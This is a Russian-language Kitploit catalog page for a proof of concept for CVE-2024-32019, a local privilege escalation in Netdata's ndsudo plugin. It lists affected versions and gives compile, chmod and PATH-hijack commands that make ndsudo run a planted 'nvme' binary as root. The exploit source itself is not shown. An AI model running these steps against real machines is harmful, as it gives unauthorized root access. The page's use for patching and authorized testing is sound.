Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32019-POC — Эксплойт-доказательство концепции для CVE-2024-32019, демонстрирующий локальное повышение привилегий через недоверенный путь поиска в плагине ndsudo Netdata. Включает инструкции по компиляции и шаги развертывания. | Kitploit
Инструменты/GitHubGitHub/alielkhatteb/cve-2024-32019-poc
Повышение привилегийЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubalielkhatteb/cve-2024-32019-poc

CVE-2024-32019-POC

Эксплойт-доказательство концепции для CVE-2024-32019, демонстрирующий локальное повышение привилегий через недоверенный путь поиска в плагине ndsudo Netdata. Включает инструкции по компиляции и шаги развертывания.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
521 год назадЕщё не проверено

⚠️ CVE-2024-32019 - PoC

📌 Затронутые версии

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🛠️ Доказательство концепции

CVE-2024-32019 — локальное повышение привилегий через ndsudo с использованием ненадёжного пути поиска.

🔧 Компиляция эксплойта

root@kitploit:~
x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 Развёртывание на целевой машине

  1. Перенесите скомпилированный бинарный файл на уязвимую машину.

  2. Сделайте его исполняемым:

    root@kitploit:~
    chmod +x nvme
    
  3. Эксплуатируйте уязвимый бинарный файл через манипуляцию PATH (используйте тот же путь, куда вы загрузили свой бинарный файл):

    root@kitploit:~
    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 Ссылка

  • Совет по безопасности Netdata - GHSA-pmhq-4cxq-wj93

⚖️ Отказ от ответственности и условия

Этот код доказательства концепции (PoC) предоставляется только для образовательных целей и авторизованного тестирования на проникновение.

  • Не даётся разрешения на изменение, распространение или использование этого кода в любых других целях.
  • Несанкционированное использование или изменение может быть незаконным и неэтичным.
  • Авторы не несут никакой ответственности за любое неправомерное использование или ущерб.
Скачать инструмент